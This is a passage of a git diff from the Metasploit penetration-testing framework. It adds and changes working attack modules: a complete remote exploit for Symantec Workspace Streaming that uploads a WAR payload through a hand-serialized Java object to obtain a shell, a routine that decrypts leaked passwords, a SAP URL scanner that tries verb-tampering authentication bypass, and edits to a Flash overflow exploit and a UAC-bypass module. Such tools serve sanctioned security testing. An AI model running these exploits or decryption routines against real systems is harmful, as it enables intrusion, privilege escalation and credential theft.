1 + @plain_passwords[i] = + begin + decrypt_password(@users[i][1], @users[i][2]) + rescue + "(format not recognized)" + end + + @plain_passwords[i] = "(blank password)" if @plain_passwords[i].empty? + + begin + @plain_passwords[i].encode("ISO-8859-1").to_s + rescue Encoding::UndefinedConversionError + chars = @plain_passwords[i].unpack("C*") + @plain_passwords[i] = "0x#{chars.collect {|c| c.to_s(16)}.join(", 0x")}" + @plain_passwords[i] << " (ISO-8859-1 hex chars)" + end + + report_auth_info({ + :host => rhost, + :port => rport, + :user => @users[i][0], + :pass => @plain_passwords[i], + :type => "password", + :sname => (ssl ? "https" : "http"), + :proof => "Leaked encrypted password from #{@users[i][3]}: #{@users[i][1]}:#{@users[i][2]}" + }) + + users_table << [@users[i][0], @users[i][1], @users[i][2], @plain_passwords[i], user_type(@users[i][3])] + end + + print_line(users_table.to_s) + end + + def user_type(database) + user_type = database + + unless database == "BAUser" + user_type << " (Web Access)" + end + + user_type + end + + def decrypt_password(password, key) + recovered_password = recover_password(password) + recovered_key = recover_key(key) + + recovered_bytes = decrypt_bytes(recovered_password, recovered_key) + password = [] + + recovered_bytes.each { |b| + if b == 0 + break + else + password.push(b) + end + } + + return password.pack("C*") + end + + def recover_password(password) + bytes = password.unpack("C*") + recovered = [] + + i = 0 + j = 0 + while i < 16 + low = bytes[i] + if low < 0x41 + low = low - 0x30 + else + low = low - 0x37 + end + low = low * 16 + + high = bytes[i+1] + if high < 0x41 + high = high - 0x30 + else + high = high - 0x37 + end + + recovered_byte = low + high + recovered[j] = recovered_byte + i = i + 2 + j = j + 1 + end + + recovered + end + + def recover_key(key) + bytes = key.unpack("C*") + recovered = 0 + + bytes[0, 8].each { |b| + recovered = recovered * 16 + if b < 0x41 + byte_weight = b - 0x30 + else + byte_weight = b - 0x37 + end + recovered = recovered + byte_weight + } + + recovered + end + + def decrypt_bytes(bytes, key) + result = [] + xor_table = [0xaa, 0xa5, 0x5a, 0x55] + key_copy = key + for i in 0..7 + byte = (crazy(bytes[i] ,8 - (key & 7)) & 0xff) + result.push(byte ^ xor_table[key_copy & 3]) + key_copy = key_copy / 4 + key = key / 8 + end + + result + end + + def crazy(byte, magic) + result = byte & 0xff + + while magic > 0 + result = result * 2 + if result & 0x100 == 0x100 + result = result + 1 + end + magic = magic - 1 + end + + result + end + +end + diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb index 2cff53d60b..c8ece7ac37 100644 --- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb +++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'rex/proto/http' require 'msf/core' class Metasploit3 < Msf::Auxiliary @@ -30,62 +29,43 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptString.new('VERB', [true, "Verb for auth bypass testing", "HEAD"]), - OptString.new('URLFILE', [true, "SAP ICM Paths File", "sap_icm_paths.txt"]) + OptPath.new('URLFILE', [true, "SAP ICM Paths File", + File.join(Msf::Config.data_directory, 'wordlists', 'sap_icm_paths.txt')]) ], self.class) end # Base Structure of module borrowed from jboss_vulnscan def run_host(ip) - # If URLFILE is set empty, obviously the user made a silly mistake - if datastore['URLFILE'].empty? - print_error("Please specify a URLFILE") - return - end - - # Initialize the actual URLFILE path - if datastore['URLFILE'] == "sap_icm_paths.txt" - url_file = "#{Msf::Config.data_directory}/wordlists/#{datastore['URLFILE']}" - else - # Not the default sap_icm_paths file - url_file = datastore['URLFILE'] - end - - # If URLFILE path doesn't exist, no point to continue the rest of the script - if not File.exists?(url_file) - print_error("Required URL list #{url_file} was not found") - return - end - - res = send_request_cgi( + res = send_request_cgi( { 'uri' => "/" + Rex::Text.rand_text_alpha(12), 'method' => 'GET', - 'ctype' => 'text/plain', - }, 20) + }) if res print_status("Note: Please note these URLs may or may not be of interest based on server configuration") @info = [] - if not res.headers['Server'].nil? + if res.headers['Server'] @info << res.headers['Server'] print_status("#{rhost}:#{rport} Server responded with the following Server Header: #{@info[0]}") else print_status("#{rhost}:#{rport} Server responded with a blank or missing Server Header") end - if (res.body and /class="note">(.*)code:(.*)(.*)code:(.*) 0 + l = store_loot( + 'sap.icm.urls', + "text/plain", + datastore['RHOST'], + @valid_urls, + "icm_urls.txt", "SAP ICM Urls" + ) + print_line + print_good("Stored urls as loot: #{l}") if l + end end def check_url(url) + full_url = write_url(url) res = send_request_cgi({ - 'uri' => url, + 'uri' => normalize_uri(url), 'method' => 'GET', - 'ctype' => 'text/plain', - }, 20) + }) if (res) - if not @info.include?(res.headers['Server']) and not res.headers['Server'].nil? - print_good("New server header seen [#{res.headers['Server']}]") - @info << res.headers['Server'] #Add To seen server headers + if res.headers['Server'] + unless @info.include?(res.headers['Server']) + print_good("New server header seen [#{res.headers['Server']}]") + @info << res.headers['Server'] #Add To seen server headers + end end - case - when res.code == 200 - print_good("#{rhost}:#{rport} #{url} - does not require authentication (200)") - when res.code == 403 - print_good("#{rhost}:#{rport} #{url} - restricted (403)") - when res.code == 401 - print_good("#{rhost}:#{rport} #{url} - requires authentication (401): #{res.headers['WWW-Authenticate']}") + case res.code + when 200 + print_good("#{full_url} - does not require authentication (#{res.code}) (length: #{res.headers['Content-Length']})") + @valid_urls << full_url << "\n" + when 403 + print_status("#{full_url} - restricted (#{res.code})") + when 401 + print_status("#{full_url} - requires authentication (#{res.code}): #{res.headers['WWW-Authenticate']}") + @valid_urls << full_url << "\n" # Attempt verb tampering bypass bypass_auth(url) - when res.code == 404 + when 404 # Do not return by default, only display in verbose mode - vprint_status("#{rhost}:#{rport} #{url.strip} - not found (404)") - when res.code == 500 - print_good("#{rhost}:#{rport} #{url} - produced a server error (500)") - when res.code == 301, res.code == 302 - print_good("#{rhost}:#{rport} #{url} - redirected (#{res.code}) to #{res.headers['Location']} (not following)") + vprint_status("#{full_url} - not found (#{res.code})") + when 400, 500 + print_status("#{full_url} - produced a server error (#{res.code})") + when 301, 302 + print_good("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)") + @valid_urls << full_url << "\n" + when 307 + print_status("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)") else - vprint_status("#{rhost}:#{rport} - unhandle response code #{res.code}") + print_error("#{full_url} - unhandled response code #{res.code}") + @valid_urls << full_url << "\n" end else - print_status("#{rhost}:#{rport} #{url} - not found (No Repsonse code Received)") + vprint_status("#{full_url} - not found (No Repsonse code Received)") end end + def write_url(path) + if datastore['SSL'] + protocol = 'https://' + else + protocol = 'http://' + end + + "#{protocol}#{rhost}:#{rport}#{path}" + end + def bypass_auth(url) - print_status("#{rhost}:#{rport} Check for verb tampering (#{datastore['VERB']})") + full_url = write_url(url) + vprint_status("#{full_url} Check for verb tampering (#{datastore['VERB']})") res = send_request_raw({ - 'uri' => url, + 'uri' => normalize_uri(url), 'method' => datastore['VERB'], 'version' => '1.0' # 1.1 makes the head request wait on timeout for some reason - }, 20) + }) - if (res and res.code == 200) - print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering") + if (res && res.code == 200) + print_good("#{full_url} Got authentication bypass via HTTP verb tampering") else - print_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering") + vprint_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering") end end + + # "/urlprefix outputs the list of URL prefixes that are handled in the ABAP part of the SAP Web AS. + # This is how the message server finds out which URLs must be forwarded where. + # (SAP help) -> this disclose custom URLs that are also checked for authentication + def check_urlprefixes + urls = [] + res = send_request_cgi({ + 'uri' => "/sap/public/icf_info/urlprefix", + 'method' => 'GET', + }) + + if (res && res.code == 200) + res.body.each_line do |line| + if line =~ /PREFIX=/ + url_enc = line.sub(/^PREFIX=/, '') + # Remove CASE and VHOST + url_enc = url_enc.sub(/&CASE=.*/, '') + url_dec = URI.unescape(url_enc).sub(/;/, '') + urls << url_dec.strip + end + end + else + print_error("#{rhost}:#{rport} Could not retrieve urlprefixes") + end + + urls + end end diff --git a/modules/auxiliary/scanner/snmp/brocade_enumhash.rb b/modules/auxiliary/scanner/snmp/brocade_enumhash.rb index b06f16ec29..92bca9cb55 100644 --- a/modules/auxiliary/scanner/snmp/brocade_enumhash.rb +++ b/modules/auxiliary/scanner/snmp/brocade_enumhash.rb @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary row.each { |val| @hashes << val.value.to_s } end - print_good("#{ip} Found Users & Password Hashes:") + print_good("#{ip} - Found user and password hashes:") end credinfo = "" @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Interrupt raise $! rescue ::Exception => e - print_error("#{ip} error: #{e.class} #{e}") + print_error("#{ip} - Error: #{e.class} #{e}") disconnect_snmp end end diff --git a/modules/auxiliary/scanner/snmp/netopia_enum.rb b/modules/auxiliary/scanner/snmp/netopia_enum.rb index 44f87f1508..07a4840766 100644 --- a/modules/auxiliary/scanner/snmp/netopia_enum.rb +++ b/modules/auxiliary/scanner/snmp/netopia_enum.rb @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Interrupt raise $! rescue ::Exception => e - print_error("#{ip} error: #{e.class} #{e}") + print_error("#{ip} - Error: #{e.class} #{e}") disconnect_snmp end end diff --git a/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb b/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb index 68a59454ac..ab88d07bfb 100644 --- a/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb +++ b/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb @@ -152,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Interrupt raise $! rescue ::Exception => e - print_error("#{ip} error: #{e.class} #{e}") + print_error("#{ip} - Error: #{e.class} #{e}") disconnect_snmp end end diff --git a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb new file mode 100644 index 0000000000..c7fe29df13 --- /dev/null +++ b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb @@ -0,0 +1,356 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rexml/document' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + include REXML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Symantec Workspace Streaming Arbitrary File Upload', + 'Description' => %q{ + This module exploits a code execution flaw in Symantec Workspace Streaming. The + vulnerability exists in the ManagementAgentServer.putFile XMLRPC call exposed by the + as_agent.exe service, which allows for uploading arbitrary files under the server root. + This module abuses the auto deploy feature in the JBoss as_ste.exe instance in order + to achieve remote code execution. This module has been tested successfully on Symantec + Workspace Streaming 6.1 SP8 and Windows 2003 SP2. Abused services listen on a single + machine deployment, and also in the backend role in a multiple machine deployment. + }, + 'Author' => + [ + 'rgod ', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2014-1649'], + ['BID', '67189'], + ['ZDI', '14-127'], + ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140512_00'] + ], + 'Privileged' => true, + 'Platform' => 'java', + 'Arch' => ARCH_JAVA, + 'Targets' => + [ + [ 'Symantec Workspace Streaming 6.1 SP8 / Java Universal', {} ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'May 12 2014')) + + register_options( + [ + Opt::RPORT(9855), # as_agent.exe (afuse XMLRPC to upload arbitrary file) + OptPort.new('STE_PORT', [true, "The remote as_ste.exe AS server port", 9832]), # as_ste.exe (abuse jboss auto deploy) + ], self.class) + end + + def send_xml_rpc_request(xml) + res = send_request_cgi( + { + 'uri' => normalize_uri("/", "xmlrpc"), + 'method' => 'POST', + 'ctype' => 'text/xml; charset=UTF-8', + 'data' => xml + }) + + res + end + + def build_soap_get_file(file_path) + xml = Document.new + xml.add_element( + "methodCall", + { + 'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions" + }) + method_name = xml.root.add_element("methodName") + method_name.text = "ManagementAgentServer.getFile" + + params = xml.root.add_element("params") + + param_server_root = params.add_element("param") + value_server_root = param_server_root.add_element("value") + value_server_root.text = "*AWESE" + + param_file_type = params.add_element("param") + value_file_type = param_file_type.add_element("value") + type_file_type = value_file_type.add_element("i4") + type_file_type.text = "0" # build path from the server root directory + + param_file_name = params.add_element("param") + value_file_name = param_file_name.add_element("value") + value_file_name.text = file_path + + param_file_binary = params.add_element("param") + value_file_binary = param_file_binary.add_element("value") + type_file_binary = value_file_binary.add_element("boolean") + type_file_binary.text = "0" + + xml << XMLDecl.new("1.0", "UTF-8") + + xml.to_s + end + + def build_soap_put_file(file) + xml = Document.new + xml.add_element( + "methodCall", + { + 'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions" + }) + method_name = xml.root.add_element("methodName") + method_name.text = "ManagementAgentServer.putFile" + + params = xml.root.add_element("params") + + param_server_root = params.add_element("param") + value_server_root = param_server_root.add_element("value") + value_server_root.text = "*AWESE" + + param_file_type = params.add_element("param") + value_file_type = param_file_type.add_element("value") + type_file_type = value_file_type.add_element("i4") + type_file_type.text = "0" # build path from the server root directory + + param_file = params.add_element("param") + value_file = param_file.add_element("value") + type_value_file = value_file.add_element("ex:serializable") + type_value_file.text = file + + xml << XMLDecl.new("1.0", "UTF-8") + + xml.to_s + end + + def build_soap_check_put + xml = Document.new + xml.add_element( + "methodCall", + { + 'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions" + }) + method_name = xml.root.add_element("methodName") + method_name.text = "ManagementAgentServer.putFile" + xml.root.add_element("params") + xml << XMLDecl.new("1.0", "UTF-8") + xml.to_s + end + + def parse_method_response(xml) + doc = Document.new(xml) + file = XPath.first(doc, "methodResponse/params/param/value/ex:serializable") + + unless file.nil? + file = Rex::Text.decode_base64(file.text) + end + + file + end + + def get_file(path) + xml_call = build_soap_get_file(path) + file = nil + + res = send_xml_rpc_request(xml_call) + + if res && res.code == 200 && res.body + file = parse_method_response(res.body.to_s) + end + + file + end + + def put_file(file) + result = nil + xml_call = build_soap_put_file(file) + + res = send_xml_rpc_request(xml_call) + + if res && res.code == 200 && res.body + result = parse_method_response(res.body.to_s) + end + + result + end + + def upload_war(war_name, war, dst) + result = false + java_file = build_java_file_info("#{dst}#{war_name}", war) + java_file = Rex::Text.encode_base64(java_file) + + res = put_file(java_file) + + if res && res =~ /ReturnObject.*StatusMessage.*Boolean/ + result = true + end + + result + end + + def jboss_deploy_path + path = nil + leak = get_file("bin/CreateDatabaseSchema.cmd") + + if leak && leak =~ /\[INSTALLDIR\](.*)ste\/ste.jar/ + path = $1 + end + + path + end + + def check + check_result = Exploit::CheckCode::Safe + + if jboss_deploy_path.nil? + xml = build_soap_check_put + res = send_xml_rpc_request(xml) + + if res && res.code == 200 && res.body && res.body.to_s =~ /No method matching arguments/ + check_result = Exploit::CheckCode::Detected + end + else + check_result = Exploit::CheckCode::Appears + end + + check_result + end + + def exploit + print_status("#{peer} - Leaking the jboss deployment directory...") + jboss_path =jboss_deploy_path + + if jboss_path.nil? + fail_with(Exploit::Unknown, "#{peer} - Failed to disclose the jboss deployment directory") + end + + print_status("#{peer} - Building WAR payload...") + + app_name = Rex::Text.rand_text_alpha(4 + rand(4)) + war_name = "#{app_name}.war" + war = payload.encoded_war({ :app_name => app_name }).to_s + deploy_dir = "..#{jboss_path}" + + print_status("#{peer} - Uploading WAR payload...") + + res = upload_war(war_name, war, deploy_dir) + + unless res + fail_with(Exploit::Unknown, "#{peer} - Failed to upload the war payload") + end + + register_files_for_cleanup("../server/appstream/deploy/#{war_name}") + + 10.times do + select(nil, nil, nil, 2) + + # Now make a request to trigger the newly deployed war + print_status("#{rhost}:#{ste_port} - Attempting to launch payload in deployed WAR...") + res = send_request_cgi( + { + 'uri' => normalize_uri("/", app_name, Rex::Text.rand_text_alpha(rand(8)+8)), + 'method' => 'GET', + 'rport' => ste_port # Auto Deploy can be reached through the "as_ste.exe" service + }) + # Failure. The request timed out or the server went away. + break if res.nil? + # Success! Triggered the payload, should have a shell incoming + break if res.code == 200 + end + + end + + def ste_port + datastore['STE_PORT'] + end + + # com.appstream.cm.general.FileInfo serialized object + def build_java_file_info(file_name, contents) + stream = "\xac\xed" # stream magic + stream << "\x00\x05" # stream version + stream << "\x73" # new Object + + stream << "\x72" # TC_CLASSDESC + stream << ["com.appstream.cm.general.FileInfo".length].pack("n") + stream << "com.appstream.cm.general.FileInfo" + stream << "\xa3\x02\xb6\x1e\xa1\x6b\xf0\xa7" # class serial version identifier + stream << "\x02" # flags SC_SERIALIZABLE + stream << [6].pack("n") # number of fields in the class + + stream << "Z" # boolean + stream << ["bLastPage".length].pack("n") + stream << "bLastPage" + + stream << "J" # long + stream << ["lFileSize".length].pack("n") + stream << "lFileSize" + + stream << "[" # array + stream << ["baContent".length].pack("n") + stream << "baContent" + stream << "\x74" # TC_STRING + stream << ["[B".length].pack("n") + stream << "[B" # field's type (byte array) + + stream << "L" # Object + stream << ["dTimeStamp".length].pack("n") + stream << "dTimeStamp" + stream << "\x74" # TC_STRING + stream << ["Ljava/util/Date;".length].pack("n") + stream << "Ljava/util/Date;" #field's type (Date) + + stream << "L" # Object + stream << ["sContent".length].pack("n") + stream << "sContent" + stream << "\x74" # TC_STRING + stream << ["Ljava/lang/String;".length].pack("n") + stream << "Ljava/lang/String;" #field's type (String) + + stream << "L" # Object + stream << ["sFileName".length].pack("n") + stream << "sFileName" + stream << "\x71" # TC_REFERENCE + stream << [0x007e0003].pack("N") # handle + + stream << "\x78" # TC_ENDBLOCKDATA + stream << "\x70" # TC_NULL + + # Values + stream << [1].pack("c") # bLastPage + + stream << [0xffffffff, 0xffffffff].pack("NN") # lFileSize + + stream << "\x75" # TC_ARRAY + stream << "\x72" # TC_CLASSDESC + stream << ["[B".length].pack("n") + stream << "[B" # byte array) + stream << "\xac\xf3\x17\xf8\x06\x08\x54\xe0" # class serial version identifier + stream << "\x02" # flags SC_SERIALIZABLE + stream << [0].pack("n") # number of fields in the class + stream << "\x78" # TC_ENDBLOCKDATA + stream << "\x70" # TC_NULL + stream << [contents.length].pack("N") + stream << contents # baContent + + stream << "\x70" # TC_NULL # dTimeStamp + + stream << "\x70" # TC_NULL # sContent + + stream << "\x74" # TC_STRING + stream << [file_name.length].pack("n") + stream << file_name # sFileName + + stream + end + +end diff --git a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb index 43997895ef..c29080ed3c 100644 --- a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb +++ b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb @@ -17,8 +17,8 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a buffer overflow vulnerability in Adobe Flash Player. The vulnerability occurs in the flash.Display.Shader class, when setting specially crafted data as its bytecode, as exploited in the wild in April 2014. This module - has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over - Windows XP SP3, Windows 7 SP1 and Windows 8. + has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13 + over Windows XP SP3, Windows 7 SP1 and Windows 8. }, 'License' => MSF_LICENSE, 'Author' => @@ -42,7 +42,8 @@ class Metasploit3 < Msf::Exploit::Remote }, 'DefaultOptions' => { - 'InitialAutoRunScript' => 'migrate -f', + # Disabled by default to allow sessions on Firefox, still useful when exploiting IE + #'InitialAutoRunScript' => 'migrate -f', 'Retries' => false, 'EXITFUNC' => "thread" }, @@ -50,10 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote 'BrowserRequirements' => { :source => /script|headers/i, - :clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", - :method => "LoadMovie", :os_name => Msf::OperatingSystems::WINDOWS, - :ua_name => Msf::HttpClients::IE, + :ua_name => lambda { |ua| ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF}, :flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') } }, 'Targets' => @@ -84,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote if request.uri =~ /\.swf$/ print_status("Sending SWF...") - send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'}) + send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) return end @@ -111,6 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote + diff --git a/modules/exploits/windows/local/bypassuac_injection.rb b/modules/exploits/windows/local/bypassuac_injection.rb index 6ae987f891..8d286bbfc3 100644 --- a/modules/exploits/windows/local/bypassuac_injection.rb +++ b/modules/exploits/windows/local/bypassuac_injection.rb @@ -24,6 +24,8 @@ class Metasploit3 < Msf::Exploit::Local technique to drop only the DLL payload binary instead of three seperate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also). + If specifying EXE::Custom your DLL should call ExitProcess() after starting + your payload in a seperate process. }, 'License' => MSF_LICENSE, 'Author' => [ diff --git a/spec/lib/metasploit/framework/login_scanner/db2_spec.rb b/spec/lib/metasploit/framework/login_scanner/db2_spec.rb new file mode 100644 index 0000000000..222f2d41f3 --- /dev/null +++ b/spec/lib/metasploit/framework/login_scanner/db2_spec.rb @@ -0,0 +1,44 @@ +require 'spec_helper' +require 'metasploit/framework/login_scanner/db2' + +describe Metasploit::Framework::LoginScanner::DB2 do + let(:public) { 'root' } + let(:private) { 'toor' } + let(:test_cred) { + Metasploit::Framework::LoginScanner::Credential.new( public: public, private: private ) + } + subject(:login_scanner) { described_class.new } + + it_behaves_like 'Metasploit::Framework::LoginScanner::Base' + it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket' + + context '#attempt_login' do + + context 'when the socket errors' do + it 'returns a connection_error result for an Rex::ConnectionError' do + my_scanner = login_scanner + my_scanner.should_receive(:connect).and_raise ::Rex::ConnectionError + result = my_scanner.attempt_login(test_cred) + expect(result.status).to eq :connection_error + expect(result.proof).to eq ::Rex::ConnectionError.new.to_s + end + + it 'returns a connection_error result for an Rex::ConnectionTimeout' do + my_scanner = login_scanner + my_scanner.should_receive(:connect).and_raise ::Rex::ConnectionTimeout + result = my_scanner.attempt_login(test_cred) + expect(result.status).to eq :connection_error + expect(result.proof).to eq ::Rex::ConnectionTimeout.new.to_s + end + + it 'returns a connection_error result for an ::Timeout::Error' do + my_scanner = login_scanner + my_scanner.should_receive(:connect).and_raise ::Timeout::Error + result = my_scanner.attempt_login(test_cred) + expect(result.status).to eq :connection_error + expect(result.proof).to eq ::Timeout::Error.new.to_s + end + end + end + +end \ No newline at end of file